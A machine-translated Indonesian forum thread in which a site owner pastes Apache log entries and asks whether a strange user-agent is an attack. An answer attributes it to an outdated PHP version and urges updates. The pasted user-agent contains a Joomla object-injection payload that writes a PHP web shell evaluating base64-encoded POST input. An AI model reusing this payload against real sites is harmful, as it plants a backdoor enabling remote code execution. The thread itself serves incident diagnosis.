Entri log akses Apache di situs saya biasanya seperti ini:
207.46.13.174 - - [31 / Okt / 2016: 10: 18: 55 +0100] "DAPATKAN / hubungi HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (kompatibel; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607
sehingga Anda dapat melihat bidang agen pengguna di sana. Tapi hari ini saya juga menemukan bidang agen pengguna yang digunakan seperti ini:
62.210.162.42 - - [31 / Okt / 2016: 11: 24: 19 +0100] "DAPATKAN / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT " ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\ "\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); exit;"; s: 19: " cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304
Apakah ini serangan? Entri log berikutnya tampaknya telah berhasil mengambil (kode 200) file yang sqlconfigbak.php
disebutkan dalam skrip. Meskipun saya tidak dapat menemukan file dalam sistem file:
62.210.162.42 - - [31 / Okt / 2016: 11: 24: 20 +0100] "DAPAT //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (kompatibel; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244
Tolong apa yang terjadi di sini?
sumber
Selain jawaban lain, perhatikan bahwa fakta bahwa serangan ini tampaknya berhasil menunjukkan Anda menjalankan versi PHP lama yang tidak aman. Perbaikan untuk bug yang dieksploitasi serangan ini dirilis pada bulan September 2015. Jalankan proses pembaruan Anda dan pastikan itu menarik versi PHP terbaru. Dan periksa juga program-program usang lainnya yang menghadap ke Internet, karena tampaknya server Anda belum diperbarui selama setidaknya satu tahun.
sumber